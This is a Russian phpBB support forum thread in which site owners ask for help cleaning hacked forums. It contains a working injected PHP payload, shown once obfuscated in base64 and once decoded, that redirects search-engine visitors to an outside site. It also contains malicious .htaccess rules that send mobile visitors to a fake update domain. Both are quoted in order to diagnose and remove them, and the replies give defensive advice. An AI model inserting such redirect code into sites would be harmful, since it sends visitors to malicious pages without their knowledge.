Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 17 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 17 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 41 раз
Поблагодарили: 1716 раз

Re: Как убить Трояна?

Сообщение Sheer »

Татьяна5
Много ли у вас там модов стоит?
Татьяна5 писал(а):как хоть выловить код вируса (без перезаливки всех файлов)?
Скачайте все на локальный компьютер и сравнивайте файлы с дистрибутивом. WinMerge вам в помощь.
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 15 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение MIT »

Татьяна5, проверил в двух браузерах — редиректа нет.
В файлах ничего подозрительного не заметил.
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 7 месяцев
Поблагодарили: 78 раз

Как убить Трояна?

Сообщение МайскийЖук »

Подтверждаю. На данный момент редиректа нет. Проверено в четырех браузерах.
Любовь и боль, покой и бой я как любой несу с собой…
Аватара пользователя
Татьяна5
Поддержка
Поддержка
Сообщения: 12443
Стаж: 12 лет 8 месяцев
Благодарил (а): 166 раз
Поблагодарили: 2479 раз

Re: Как убить Трояна?

Сообщение Татьяна5 »

Да, уже исправили (не я, так что не знаю что это было)
Аватара пользователя
Pazh
Former team member
Сообщения: 2317
Стаж: 14 лет 5 месяцев
Благодарил (а): 37 раз
Поблагодарили: 261 раз

Re: Как убить Трояна?

Сообщение Pazh »

Внимание! на radikal-е снова обнаружен троян, осторожней с этим сервисом
Помощь в ЛС/email только за WM или ЮMoney
Аватара пользователя
Di_Mok
Former team member
Сообщения: 814
Стаж: 14 лет 1 месяц
Откуда: Родной Гондурас ;)
Благодарил (а): 28 раз
Поблагодарили: 13 раз

Re: Как убить Трояна?

Сообщение Di_Mok »

Заимел в *.php такую прелесть:
Скрытый текст

Код: Выделить всё

<?php	                                       			eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zaXRlLnBvcnRyZWxheS5jb20vIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));
Если по русски, вот:
Скрытый текст

Код: Выделить всё

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://site.portrelay.com/");
		exit();
	}
}
}
Компутер стерилен как нераспакованный презерватив. Хостер, штоли? Поменял пароль, будем посмотреть.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 15 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Благодарил (а): 1 раз
Поблагодарили: 27 раз

Re: Как убить Трояна?

Сообщение MIT »

Хостеру незачем заниматься такими глупостями. Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы — ты привёл только код полезной нагрузки, но не бекдор, который наверняка должен быть.

Ну и да, с чего ты взял, что компутер стерилен?
Аватара пользователя
Di_Mok
Former team member
Сообщения: 814
Стаж: 14 лет 1 месяц
Откуда: Родной Гондурас ;)
Благодарил (а): 28 раз
Поблагодарили: 13 раз

Re: Как убить Трояна?

Сообщение Di_Mok »

MIT писал(а):Хостеру незачем заниматься такими глупостями
Я ж не гворю, что намеренно.
MIT писал(а):Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы
Это понятно, но пока не реально - праздники, блин.
MIT писал(а):Ну и да, с чего ты взял, что компутер стерилен?
Конечно, со 100% уверенностью сказать ничего нельзя. Но не давно перестановленная винда сминимальным набором софта аля: офис, ноутпад++, тотал, гимп... , и отсутствие привычки серфить где непопадя, придают некоторую уверенность
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 18 лет 11 месяцев
Благодарил (а): 20 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение MAzZY »

Di_Mok, какой хостер? Недавно на Логоле было такое - всех заразили.
Аватара пользователя
Di_Mok
Former team member
Сообщения: 814
Стаж: 14 лет 1 месяц
Откуда: Родной Гондурас ;)
Благодарил (а): 28 раз
Поблагодарили: 13 раз

Re: Как убить Трояна?

Сообщение Di_Mok »

Хороший хостинг в питере
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 18 лет 11 месяцев
Благодарил (а): 20 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение MAzZY »

Тогда нет. Тогда искать шелл. Влезть могли разными способами, сейчас уже не сказать как. Если не получается самостоятельно решить - пиши в личку, помогу. Опыт имеется.
lesha20
phpBB 1.4.0
Сообщения: 31
Стаж: 11 лет 7 месяцев
Благодарил (а): 5 раз
Поблагодарили: 1 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение lesha20 »

Сегодня были дополнены все файлы .htaccess на сайте, несмотря на запрет записи (444), следующими строчками:

Код: Выделить всё

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://critical-upd.ru/?upd&source=.htaccess [L,R=302] #
Примерно такие же записи были дополнены в .htaccess - 18 декабря 2012г.

Хостер говорит, что это уязвимость ваших скриптов. Что атрибут 444 на 644 могут поменять скрипты.

Что интересно - у измененных файлов не поменялась дата изменения, она осталась 19.12.12 - эта та дата, когда я восстановил все файлы .htaccess после случая 18.12.12. Скрипты тоже могут такое вытворять?

Также заметил, что в файлах .htaccess изменен формат переноса строк с UNIX на WINDOWS.

Сам я создал и захожу на хостинг через виртуальную машину, где установлен Windows 7, антивирус Касперского и ftp-клиент FileZilla Client. Пароли хранятся только в зашифрованном архиве, который после его закрытия затирает временную папку. В браузере и ftp-клиенте пароли (для захода на хостинг) не сохраняю.

Есть подозрения на ftp-клиент FileZilla Client, который утащил мои пароли. Хотя хостер настаивает, что это уязвимость ваших скриптов. А на самом деле как узнать кто, откуда, каким способом меняет файлы .htaccess?
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 7 месяцев
Поблагодарили: 78 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение МайскийЖук »

Только на астральном уровне.

На какие конкретно скрипты грешит хостер? Так можно от любой проблемы отмазаться: «это ваши скрипты». А какие скрипты-то?
Любовь и боль, покой и бой я как любой несу с собой…
lesha20
phpBB 1.4.0
Сообщения: 31
Стаж: 11 лет 7 месяцев
Благодарил (а): 5 раз
Поблагодарили: 1 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение lesha20 »

Я тоже задавал такой вопрос, ответ был:
Это уязвимость скриптов. Сайт сломан через дыры в скриптах а не через пароли.
У нас возможности отслеживать ваши скрипты нет.


А как еще можно изменить файлы .htaccess не затронув дату изменения?
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 7 месяцев
Поблагодарили: 78 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение МайскийЖук »

Скрипты форумного движка phpBB3 не позволяют просто так изменять какие-либо файлы. Тем более, .htaccess. Это все, что я знаю.

Что еще есть на сайте/форуме?
Любовь и боль, покой и бой я как любой несу с собой…

Вернуться в «phpBB-пространство»